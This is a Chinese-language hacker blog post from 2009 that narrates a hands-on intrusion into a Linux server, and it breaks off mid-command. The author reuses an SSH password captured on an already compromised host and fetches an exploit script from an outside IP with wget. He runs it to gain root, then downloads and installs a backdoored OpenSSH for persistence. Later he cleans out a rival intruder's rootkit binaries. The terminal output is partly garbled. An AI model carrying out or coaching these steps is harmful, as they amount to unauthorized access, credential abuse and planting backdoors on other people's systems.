linux入侵:对一台linux肉鸡的简单手工入侵检测

on 2009-9-2 in Linux | 0 Comment
by:vitter
blog:blog.securitycn.net

今天发现台肉鸡上某人ssh连到另外台服务器上记录下了密码
[root@mail ~]# cat /tmp/sshpswd
ldc:[email protected]
直接ssh上去
[root@mail ~]# ssh [email protected]
[email protected]'s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r _disibledevent=>http://211.100.50.70/u.sh
--13:21:09--  http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80... 宸茶繛鎺ャ?
宸插彂鍑?HTTP 璇锋眰锛屾鍦ㄧ瓑寰呭洖搴?.. 200 OK
闀垮害锛?366 (3.3K) [application/x-sh]
Saving t `u.sh'

100%[=>] 3,366       --.-K/s   in 0.04s  

13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]

[ldc@localhost .v]$ ls
r00t    r00t.c  u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
f69f8800 0   2486   00000111 0        0        00000000 2
f7fdae00 0   0      00000000 0        0        00000000 2
c2132200 6   0      00000000 0        0        00000000 2
f6a57a00 7   2143   00000001 0        0        00000000 2
f7caf000 7   0      00000000 0        0        00000000 2
f6a0be00 9   2143   00000000 0        0        00000000 2
f6a61200 9   1996   00000000 0        0        00000000 2
f7de1c00 9   0      00000000 0        0        00000000 2
f7d6ca00 10  0      00000000 0        0        00000000 2
f7fb3200 11  0      00000000 0        0        00000000 2
c2154200 15  476    ffffffff 0        0        00000000 2
f7fdac00 15  0      00000000 0        0        00000000 2
f7fb3000 16  0      00000000 0        0        00000000 2
c21cde00 18  0      00000000 0        0        00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root       477  0.0  0.0  2916 1396 ?        S<   12:36   0:00 /sbin/udevd -d
ldc       3462  0.0  0.0  4128  680 pts/0    S    13:00   0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c: 鍦ㄥ嚱鏁?鈥榤ain鈥?涓細
suid.c:3: 璀﹀憡锛氶殣寮忓0鏄庝笌鍐呭缓鍑芥暟 鈥榚xecl鈥?涓嶅吋瀹

sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:Low-High

已经是root权限了

sh-3.1# w
13:25:18 up 48 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
ldc      pts/0    100.204.107.20    13:05    0.00s  0.12s  0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006

我们先留个ssh后门

sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08--  http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... 宸茶繛鎺ャ?
宸插彂鍑?HTTP 璇锋眰锛屾鍦ㄧ瓑寰呭洖搴?.. 200 OK
闀垮害锛?79990 (957K) [application/x-gzip]
Saving t `openssh4.3p2.tar.gz'

100%[=>] 979,990     1.14M/s   in 0.8s  

13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]

sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............(省略若干行)

sh-3.1# make && make
conffile=`echo sshd_config.out | sed 's/.out$//'`; \
        /bin/sed -e 's|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g' -e
............(省略若干行)

sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
鍋滄 sshd锛                                              [纭畾]
鍚姩 sshd锛                                              [纭畾]

ok了用我们sshdoor登录

[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:Low-High

[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2298/hpiod          
tcp        0      0 0.0.0.0:1000                0.0.0.0:*                   LISTEN      2090/rpc.statd      
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      2056/portmap        
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      2883/vsftpd        
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2315/cupsd          
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2361/sendmail: acce    
tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2303/python            

总感觉这系统怪怪连22端口都看不到应该替换了netstat了先看看有没有其他被替换掉系统文件吧

[root@localhost ~]# rpm -qaV
S.5..UG.   /bin/netstat
S.5..UG.   /sbin/config
S.5....T   /usr/bin/ssh-keygen
S.5....T c /etc/sysconfig/system-config-securitylevel
S.5..UG.   /usr/sbin/lsof
.M......   /var/tux
S.5....T c /etc/inittab
S.5....T   /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5....T   /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5....T   /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5....T   /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5....T   /usr/share/texmf-var/web2c/aleph.fmt
S.5....T   /usr/share/texmf-var/web2c/amstex.fmt
S.5....T   /usr/share/texmf-var/web2c/bamstex.fmt
S.5....T   /usr/share/texmf-var/web2c/bplain.fmt
S.5....T   /usr/share/texmf-var/web2c/cont-en.fmt
S.5....T   /usr/share/texmf-var/web2c/etex.fmt
..5....T   /usr/share/texmf-var/web2c/metafun.mem
S.5....T   /usr/share/texmf-var/web2c/mf.base
..5....T   /usr/share/texmf-var/web2c/mpost.mem
S.5....T   /usr/share/texmf-var/web2c/mptopdf.fmt
S.5....T   /usr/share/texmf-var/web2c/omega.fmt
S.5....T   /usr/share/texmf-var/web2c/pdfetex.fmt
S.5....T   /usr/share/texmf-var/web2c/pdftex.fmt
S.5....T   /usr/share/texmf-var/web2c/tex.fmt
.......T c /etc/kdump.conf
S.5....T c /etc/prcap
..5....T c /etc/pki/nssdb/secmod.db
....L... c /etc/pam.d/system-auth
.M...... c /etc/cups/es.conf
.......T c /etc/audit/auditd.conf
missing     /usr/sbin/nscd
S.5....T c /etc/sysconfig/named
.M......   /var/named
SM5..UG.   /bin/ps
SM5..UG.   /usr/bin/top
SM5....T c /etc/sysconfig/iptables-config
S.5..UG.   /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?.....   /usr/lib/libGL.so.1.2
S.5....T c /etc/ppp/chap-secrets
S.5....T c /etc/ppp/pap-secrets
S.5....T c /etc/xml/catalog
S.5....T c /usr/share/sgml/docbook/xmlcatalog
S.5....T c /etc/ssh/ssh_config
S.5....T   /usr/bin/scp
S.5....T   /usr/bin/sftp
S.5....T   /usr/bin/ssh
S.5....T   /usr/bin/ssh-add
SM5...GT   /usr/bin/ssh-agent
S.5....T   /usr/bin/ssh-keyscan
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5....T   /etc/sgml/docbook-slides.cat
S.5....T   /usr/share/icons/hicolor/icon-theme.cache
S.5..UG.   /bin/ls
S.5..UG.   /usr/bin/dir
S.5..UG.   /usr/bin/md5sum
S.5..UG.   /usr/bin/pstree
S.5....T c /etc/syslog.conf
S.5....T c /etc/ssh/sshd_config
S.5....T   /usr/sbin/sshd
missing     /var/lib/texmf/ls-R
S.5....T   /etc/sgml/docbook-simple.cat
S.5....T c /etc/vsftpd/vsftpd.conf
.M......   /var/ftp/pub
S.5....T c /etc/mailcap
......G.   /var/cache/samba/winbindd_privileged
.......T c /etc/mail/sendmail.cf
SM5....T c /etc/mail/submit.cf
S.5....T c /var/log/mail/statistics
..5....T c /usr/lib/security/path.security
S.5....T c /etc/sane.d/dll.conf
还好rpm没替换看来系统好些命令被替换了嘿嘿有同行在啊
不好意思那我就要T你下去了下面先检查当然这个系统不可靠了我们先替换回可靠命令:

[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir': Operation not permitted

chattr加了iau了

[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir

ok了看看还有什么吧:

[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc| grep -e -ia
s---ia------- /bin/ps
s---ia------- /bin/ls
s---ia------- /bin/netstat
s---ia------- /sbin/config
s---ia------- /sbin/ttymon
s---ia------- /sbin/ttyload
s---ia------- /usr/bin/top
s---ia------- /usr/bin/md5sum
s---ia------- /usr/bin/pstree.x11
s---ia------- /usr/bin/find
s---ia------- /usr/bin/dir
s---ia------- /usr/bin/pstree
s---ia------- /usr/sbin/lsof
s---ia------- /usr/sbin/ttyload
s---ia------- /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.奫root@localhost bin]# chmod +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat

同样方式把/usr/sbin/lsof、/usr/bin/find等都替换回来
再用netstat看看端口吧:
[root@localhost bin]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name  
tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2298/hpiod          
tcp        0      0 0.0.0.0:1000                0.0.0.0:*                   LISTEN      2090/rpc.statd      
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      2056/portmap        
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      2883/vsftpd        
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2315/cupsd          
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2361/sendmail: acce
tcp        0      0 0.0.0.0:65530               0.0.0.0:*                   LISTEN      2663/ttyload       (有东东出来了吧)
tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2303/python        
tcp        0      0 :::22                       :::*                        LISTEN      13935/sshd        

现在再用chkrootkit和rkhunter查下看看:

[root@loca
Tags:  linux入侵

延伸阅读

最新评论

发表评论